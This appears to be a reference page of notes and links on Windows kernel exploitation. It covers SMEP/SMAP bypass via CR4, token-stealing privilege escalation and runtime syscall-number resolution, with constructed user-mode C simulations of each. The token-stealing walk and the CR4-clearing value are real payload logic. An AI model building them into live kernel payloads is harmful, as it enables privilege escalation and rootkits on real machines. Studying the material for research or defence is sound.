Exploitation
https://rootkits.xyz/blog/2017/06/kernel-setting-up/
Rusty Windows Kernel Rootkit
Anti Cheats
Protections
SMAP (Supervisor Mode Access Prevention) - prevents ring 0 from reading or writing user-mode pages (U/S = 1 in the PTE) unless the kernel has explicitly set EFLAGS.AC around the access with STAC/CLAC. A payload that dereferences a buffer in the exploit process without that window takes a page fault.
SMEP (Supervisor Mode Execution Prevention) - prevents ring 0 from fetching instructions from user-mode pages, so redirecting a kernel RIP into shellcode mapped by the exploit process faults. Unlike SMAP there is no AC override.
Both flags live in CR4: SMEP is bit 20, SMAP is bit 21. Read them with __readcr4() from a driver or with r cr4 in WinDbg. Older exploits cleared the bits with a mov cr4, reg ROP gadget; PatchGuard and, when VBS/HVCI is on, the hypervisor watch those bits, so modern chains keep the payload in kernel-mode memory instead.
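The following is an added example, not code from the page or any linked project. It models the two CR4 checks above: given a CR4 value, EFLAGS, and whether the supervisor-mode access targets a user-mode page, it reports whether SMEP or SMAP would fault, and shows why a STAC window lets the kernel read a user buffer while SMEP has no equivalent escape. The bit positions are the documented CR4/EFLAGS ones; the sample CR4 value is constructed.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* CR4 bit positions (Intel SDM, CR4 layout). */
#define CR4_SMEP (1ULL << 20)
#define CR4_SMAP (1ULL << 21)

/* EFLAGS.AC (bit 18): STAC sets it, CLAC clears it; SMAP is suspended while it is set. */
#define EFLAGS_AC (1ULL << 18)

/* A memory access performed while CPL == 0. */
struct sup_access {
    bool user_page;   /* target page has U/S = 1 (user-mode mapping) */
    bool is_fetch;    /* instruction fetch (true) or data read/write (false) */
};

/* True if the access would #PF under the given CR4/EFLAGS. */
bool supervisor_access_faults(uint64_t cr4, uint64_t eflags, struct sup_access a)
{
    if (!a.user_page)
        return false;                    /* supervisor pages are never blocked by SMEP/SMAP */
    if (a.is_fetch)
        return (cr4 & CR4_SMEP) != 0;    /* SMEP: no AC override */
    /* SMAP only applies while EFLAGS.AC is clear; a STAC window permits the copy. */
    return (cr4 & CR4_SMAP) && !(eflags & EFLAGS_AC);
}

/* Value a "mov cr4, reg" gadget would have to write to switch both off. */
uint64_t cr4_without_smep_smap(uint64_t cr4)
{
    return cr4 & ~(CR4_SMEP | CR4_SMAP);
}

int main(void)
{
    /* Constructed sample: a CR4 value with SMEP (bit 20) and SMAP (bit 21) set. */
    uint64_t cr4 = 0x370678ULL;
    struct sup_access fetch_user = { .user_page = true, .is_fetch = true  };
    struct sup_access read_user  = { .user_page = true, .is_fetch = false };

    printf("SMEP=%d SMAP=%d\n", !!(cr4 & CR4_SMEP), !!(cr4 & CR4_SMAP));
    printf("ret2usr shellcode faults:            %d\n", supervisor_access_faults(cr4, 0, fetch_user));
    printf("kernel reads user buffer, no STAC:   %d\n", supervisor_access_faults(cr4, 0, read_user));
    printf("kernel reads user buffer after STAC: %d\n", supervisor_access_faults(cr4, EFLAGS_AC, read_user));
    printf("CR4 with both cleared: 0x%llx\n", (unsigned long long)cr4_without_smep_smap(cr4));
    return 0;
}
```

The model is the CPU's view only; on a real target the value returned by __readcr4() is what matters, and writing the cleared value back is exactly what PatchGuard and the hypervisor are there to catch.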
Mapping Physical Memory
https://git.back.engineering/_xeroxz/vdm
Driver Exploitation
https://github.com/stong/CVE-2020-15368/
Privilege Escalation
Token stealing: copy the Token field of the System process (PID 4) EPROCESS into the EPROCESS of the exploit's own process. Starting from PsGetCurrentProcess(), walk the ActiveProcessLinks list until UniqueProcessId == 4 and copy the Token value whole: it is an EX_FAST_REF whose low bits hold a reference count, so do not mask it. The field offsets change between builds; take them from symbols (dt nt!_EPROCESS in WinDbg) rather than hardcoding.
https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
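An added example of the token-stealing walk, not taken from the page or from the linked write-up. The EPROCESS layout here is a hypothetical cut-down struct with only the three fields the payload touches, built into a constructed three-process list so it runs in user mode; in a real payload the start pointer comes from PsGetCurrentProcess() and the offsets from the target build's symbols.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

/* Hypothetical _EPROCESS: only the fields the walk needs, real offsets differ per build. */
typedef struct _EPROCESS {
    uint64_t   UniqueProcessId;     /* PID */
    LIST_ENTRY ActiveProcessLinks;  /* circular list threading every process */
    uint64_t   Token;               /* EX_FAST_REF: pointer with refcount in the low bits */
} EPROCESS;

#define SYSTEM_PID 4
#define CONTAINING_RECORD(addr, type, field) \
    ((type *)((char *)(addr) - offsetof(type, field)))

/* Walk ActiveProcessLinks from any process until PID 4 is found; NULL if the list lacks it. */
EPROCESS *find_system_process(EPROCESS *start)
{
    EPROCESS *p = start;
    do {
        if (p->UniqueProcessId == SYSTEM_PID)
            return p;
        p = CONTAINING_RECORD(p->ActiveProcessLinks.Flink, EPROCESS, ActiveProcessLinks);
    } while (p != start);
    return NULL;
}

/* The classic payload: replace the caller's token with System's. 0 on success, -1 if not found. */
int steal_token(EPROCESS *current)
{
    EPROCESS *sys = find_system_process(current);
    if (!sys)
        return -1;
    /* Copy the whole EX_FAST_REF, low bits included. */
    current->Token = sys->Token;
    return 0;
}

/* Constructed sample list: System (PID 4) <-> a service <-> the attacker's process. */
static EPROCESS procs[3];

EPROCESS *build_sample_list(void)
{
    uint64_t pids[3]   = { SYSTEM_PID, 0x2a8, 0x1234 };
    uint64_t tokens[3] = { 0xffffa00012345007ULL, 0xffffa00012346000ULL, 0xffffa00012347003ULL };
    for (int i = 0; i < 3; i++) {
        procs[i].UniqueProcessId = pids[i];
        procs[i].Token = tokens[i];
        procs[i].ActiveProcessLinks.Flink = &procs[(i + 1) % 3].ActiveProcessLinks;
        procs[i].ActiveProcessLinks.Blink = &procs[(i + 2) % 3].ActiveProcessLinks;
    }
    return &procs[2];   /* start the walk from the attacker's process */
}

int main(void)
{
    EPROCESS *me = build_sample_list();
    printf("before: pid=0x%llx token=0x%llx\n",
           (unsigned long long)me->UniqueProcessId, (unsigned long long)me->Token);
    steal_token(me);
    printf("after:  pid=0x%llx token=0x%llx (System's)\n",
           (unsigned long long)me->UniqueProcessId, (unsigned long long)me->Token);
    return 0;
}
```

Because the old token's reference is simply dropped and System's is reused without taking a new one, real payloads either accept the accounting skew or spawn a child and exit quickly; that is the usual caveat with this technique.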
Windows Syscalls
https://github.com/j00ru/windows-syscalls
Note
System service numbers are not stable: they change between Windows versions and can change between builds, so shellcode that hardcodes the number from one build calls the wrong service on another. Either look the number up in the table above for the exact target build or resolve it at runtime from the mov eax, imm32 in the ntdll.dll stub.
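An added example, not from the page or the linked table, of resolving a service number at runtime instead of hardcoding it. It parses the x64 ntdll stub shape (mov r10, rcx; mov eax, imm32) and refuses stubs that do not match, which is also how an inline hook (a jmp at the entry) shows up. The stub bytes below are constructed samples; on Windows the real bytes would come from GetProcAddress(GetModuleHandleA("ntdll.dll"), "Nt...").

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* x64 ntdll stub shape on Windows 10/11:
 *   4C 8B D1          mov r10, rcx
 *   B8 xx xx xx xx    mov eax, <SSN>
 *   ...               syscall / int 2Eh path
 * Returns the SSN, or -1 if the prologue is not the clean pattern
 * (too short, or rewritten by a hook). */
int ssn_from_stub(const uint8_t *stub, size_t len)
{
    if (len < 8)
        return -1;
    if (stub[0] != 0x4C || stub[1] != 0x8B || stub[2] != 0xD1 || stub[3] != 0xB8)
        return -1;
    uint32_t imm = (uint32_t)stub[4] | ((uint32_t)stub[5] << 8) |
                   ((uint32_t)stub[6] << 16) | ((uint32_t)stub[7] << 24);
    return (int)imm;
}

/* Constructed sample: a clean stub carrying SSN 0x55. */
static const uint8_t clean_stub[] = {
    0x4C, 0x8B, 0xD1, 0xB8, 0x55, 0x00, 0x00, 0x00,  /* mov r10,rcx ; mov eax,55h */
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01,  /* test byte ptr [7FFE0308h],1 */
    0x75, 0x03, 0x0F, 0x05, 0xC3                     /* jne ; syscall ; ret */
};

/* Constructed sample: same export after an inline hook replaced the prologue with a jmp. */
static const uint8_t hooked_stub[] = {
    0xE9, 0x10, 0x20, 0x30, 0x40,                    /* jmp <hook> */
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90
};

int main(void)
{
    printf("clean stub  -> SSN %d\n", ssn_from_stub(clean_stub, sizeof clean_stub));
    printf("hooked stub -> SSN %d (pattern not found)\n", ssn_from_stub(hooked_stub, sizeof hooked_stub));
    return 0;
}
```

When a stub comes back as -1, fall back to the build-specific table rather than guessing: a hooked prologue still has the right number a few bytes further on only if the hook preserved it, and that is not something to assume.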